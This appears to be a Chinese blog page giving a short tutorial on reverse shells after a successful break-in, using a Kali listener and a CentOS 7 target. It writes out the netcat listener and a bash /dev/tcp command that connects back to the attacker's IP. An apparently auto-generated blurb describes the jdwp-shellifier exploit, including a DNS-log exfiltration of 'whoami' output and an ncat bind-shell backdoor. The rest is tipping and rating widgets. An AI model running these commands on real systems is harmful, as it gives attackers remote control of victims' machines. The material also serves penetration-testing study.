反弹shell:lvvp;python;perl ;ruby ;php;lun;awk;

环境  kali  center OS 7  基于已经渗透成功

kali 的IP地址

lvvp

确定环境 可以使用  lvvp  命令去查看

kali上执行监视端口     nc -lvvp port                端口号

nc -lvvp 10000 

在center OS 上执行   bash -i >& /dev/tcp/攻击主机ip/10000 0>&1      IP地址/端口号

bash -i >& /dev/tcp/192.168.68.137/10000 0>&1

ifconfig  测试获取到的是center OS 7的ip表示成功

  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jdwp-shellifier是一个漏洞利用脚本,用于利用Java Debug Wire Protocol (JDWP)的漏洞进行攻击。通过该脚本,攻击者可以执行命令并获取目标系统的访问权限。\[1\]脚本的使用方法包括设置目标IP和端口,以及指定要执行的命令。例如,可以使用"--cmd"参数执行命令"ping http://.`whoami`.yoww7w.dnslog.cn"来查看回显效果,或者使用"--cmd"参数执行命令"whoami"来获取当前用户的信息。\[1\]\[2\]此外,还可以使用"--cmd"参数开启一个后门,使用nc命令进行连接。例如,可以使用"--cmd"参数执行命令"ncat -lvvp 1234 -e /bin/bash"来开启一个监听端口,并使用nc进行连接。\[3\]请注意,使用jdwp-shellifier进行攻击是非法的,且可能导致严重的安全问题。建议只在合法授权的情况下使用该脚本。 #### 引用[.reference_title] - *1* *2* [JDWP漏洞验证](https://blog.csdn.net/weixin_42380348/article/details/115464387)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [java JDWP调试接口任意命令执行漏洞](https://blog.csdn.net/tangshuangsss/article/details/121987666)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值